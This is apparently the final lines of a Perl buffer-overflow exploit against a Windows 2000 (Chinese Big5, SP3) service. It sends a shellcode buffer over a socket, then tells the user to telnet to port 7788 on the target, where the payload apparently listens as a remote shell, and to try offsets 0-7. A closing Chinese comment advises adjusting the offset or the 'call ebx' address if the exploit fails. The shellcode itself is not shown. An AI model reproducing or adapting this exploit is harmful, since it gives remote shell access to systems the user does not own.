print $socket "$tag$shell/r/n";
print "send buffer.../r/n";
print "telnet target 7788/r/n";   # the payload's listening port, per the author
print "if fail, try other offset(0-7)/r/n";
print "test on Chinese Big5 Win2k sp3/r/n";
print "by Nanika@seed.net.tw minjack.tw@yahoo.com.tw/r/n";
print "thanks isno, yuange/r/n";
close($socket);   # nothing is read back from the server
若是失败~~可以调整offset~~或是更改call ebx的地址